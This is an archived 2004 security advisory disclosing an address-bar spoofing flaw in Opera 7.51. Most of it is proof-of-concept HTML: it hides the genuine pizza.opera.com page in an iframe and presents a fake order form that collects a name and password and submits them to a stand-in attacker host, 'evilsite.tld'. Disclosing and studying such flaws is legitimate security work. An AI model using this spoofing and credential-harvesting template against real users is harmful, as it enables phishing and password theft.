exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bitlanceOpera.txt

bitlanceOpera.txt
Posted Jul 27, 2004
Authored by bitlance winter

A vulnerability in the Opera 7.x series allows phishing attacks due to not updating the address bar if a web page is opened using the window.open function and then replaced using the location.replace function.

tags | exploit, web
SHA-256 | 2b64c28e854d3abd60765551937f3f7fd6835b5e59e4664a7233b171d8bbb4de

bitlanceOpera.txt

Change Mirror Download
A vulnerability is found in the Opera browser version 7.51 , which can be
exploited by spammers to spoof information displayed in the address
bar.Tested on Windows OS.

Demonstration HTML source code:

======== begin ========
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
content="0;url=javascript:(function(){})();"]
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[/script]
[style type="text/css"]
[!-- /* hide iframe element. */
iframe {
display: none !important;
}
/* hide iframe element. */ --]
[!-- /* pizza form */
body {
margin-left: 2em;
margin-right: 2em;
font-family:verdana;
font-size:80%;
}
h1 { font-size:120%;}
h2 { font-size:100%;}
table { font-size:85%; background-color:buttonface; }
table caption {
background-color:activecaption; color:captiontext;
font-weight:bold; text-align:left; }
table table { font-size:100%; }
table input { font-family:verdana; font-size:100%; }
table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[/style]
[/head]
[body]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="https://www.opera.com/" title="Opera 7.51, Everything You Need
Online"]
Opera 7.51[/a], Everything You Need Online
[/p]
[iframe title="inline frame spoofing address bar"
src="https://pizza.opera.com/order.html"]
This inline frame is hidden. See CSS.
[/iframe]
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
[td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
[td][input type="text" name="txtName" id="txtName"][/td]
[/tr]
[tr valign="top"]
[td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
[td][input type="password" name="txtPassword" id="txtPassword"][/td]
[/tr]
[tr valign="top"]
[td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
[td]
[select name="selSize" id="selSize"]
[option value="0"]--- pick a size --- [/option]
[option value="1"]Small[/option]
[option value="2"]Medium[/option]
[option value="3"]Large[/option]
[/select]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstCrust"]
[legend]Crust[/legend]
[table cellpadding="1" cellspacing="0"]
[tr]
[td][input type="radio" name="radCrust" id="radCrust_Thick"
value="Thick"][/td]
[td][label for="radCrust_Thick"
accesskey="K"]Thic[u]k[/u][/label][/td]
[td][input type="radio" name="radCrust" id="radCrust_Thin"
value="Thin"][/td]
[td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
[/tr]
[/table]
[/fieldset]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstToppings"]
[legend]Toppings[/legend]
[table cellpadding="1" cellspacing="0"]
[tr]
[td][input type="checkbox" name="chkHam" id="chkHam"
value="Ham"][/td]
[td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
[/tr]
[tr]
[td][input type="checkbox" name="chkPineapple" id="chkPineapple"
value="Pineapple"][/td]
[td][label for="chkPineapple"
accesskey="I"]P[u]i[/u]neapple[/label][/td]
[/tr]
[tr]
[td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese"
value="Extra Cheese"][/td]
[td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra
Cheese[/label][/td]
[/tr]
[/table]
[/fieldset]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2" align="right"][input type="submit" value=" Order!
"][/td]
[/tr]
[/table]
[/form]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter
P.S.
I tender my acknowledgment to my godparent who has named 'bitlance'.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close